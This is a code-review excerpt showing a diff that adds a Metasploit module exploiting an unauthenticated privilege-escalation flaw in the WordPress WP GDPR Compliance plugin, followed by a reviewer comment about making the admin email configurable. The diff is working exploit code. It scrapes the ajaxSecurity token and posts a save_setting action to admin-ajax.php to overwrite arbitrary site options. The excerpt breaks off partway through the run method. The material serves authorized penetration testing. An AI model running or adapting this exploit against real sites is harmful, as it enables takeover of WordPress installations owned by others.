modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WP GDPR Compliance Plugin Privilege Escalation',
+      'Description'     => %q{
+        The Wordpress plugin GDPR Compliance allows unauthenticated users to execute any
+        action and update any database value.
+        This comes from a lack of validation in the plugin handles in WordPress’s admin-ajax.php
+        functionality, which leads to unauthorized users being abler to trigger these handlers and
+        from a failure to do capability checks when executing its internal action 'save_setting to
+        make configuration changes.
+      },
+      'Author'          =>
+        [
+          'Mikey Veenstra (WordFence)', # Vulnerability discovery
+          'Thomas Labadie' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['URL', 'https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/'],
+          ['WPVDB', '9144']
+        ],
+      'DisclosureDate'  => 'Nov 08 2018'
+      ))
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-gdpr-compliance', '1.4.2')
+  end
+
+  def set_wp_option(name, value, ajax_security)
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => wordpress_url_admin_ajax,
+      'vars_post' => {
+        'action' => 'wpgdprc_process_action',
+        'security' => ajax_security,
+        'data' => "{\"type\":\"save_setting\",\"append\":false,\"option\":\"#{name}\",\"value\":\"#{value}\"}"
+        }
+      )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unable to access Wordpress: #{wordpress_url_admin_ajax}")
+    end
+
+    res
+  end
+
+  def run
+    print_status("Getting security token from host...")
+    wp_home_res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => target_uri.path
+    )
+
+    unless wp_home_res && wp_home_res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unable to access Wordpress: #{target_uri.path}")
+    end
+
+    ajax_security = wp_home_res.body[/"ajaxSecurity":"([a-zA-Z0-9]+)"/i, 1]
+
+    new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com"
```

Comment:
I'd like to see this set to a non-required option.  If its not set (empty), use random like this, however during a pentest, i'd want to control where it goes to (like my email).  A customer wouldn't be happy if it was set to random address that actually happens to exist, and emails are going into the wild.  Also there are lots of 'unprofessional' words that are 5 letters that may get randomly set, which would look bad to a customer.